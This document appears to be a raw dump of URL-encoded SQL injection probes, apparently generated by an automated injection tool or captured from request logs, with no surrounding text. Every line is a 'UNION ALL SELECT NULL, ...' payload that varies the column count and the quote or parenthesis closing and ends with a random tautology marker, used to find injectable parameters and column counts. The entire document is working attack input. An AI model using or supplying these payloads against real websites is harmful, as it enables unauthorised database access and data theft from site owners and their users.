1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%288821%3D8821 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%283647%3D3647 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%289451%3D9451 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%289127%3D9127 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%283009%3D3009 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%283564%3D3564 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%288102%3D8102 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%285112%3D5112 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%285964%3D5964 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%289045%3D9045 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%281485%3D1485 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%287493%3D7493 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%284091%3D4091 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%285450%3D5450 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%281838%3D1838 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%282925%3D2925 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%284978%3D4978 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27gWeg%27%3D%27gWeg 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27qBzU%27%3D%27qBzU 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27LAkL%27%3D%27LAkL 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27WnXo%27%3D%27WnXo 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27JVWj%27%3D%27JVWj 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27RWCo%27%3D%27RWCo 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27UkML%27%3D%27UkML 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27kiJS%27%3D%27kiJS 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27tYtb%27%3D%27tYtb 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27EzkU%27%3D%27EzkU 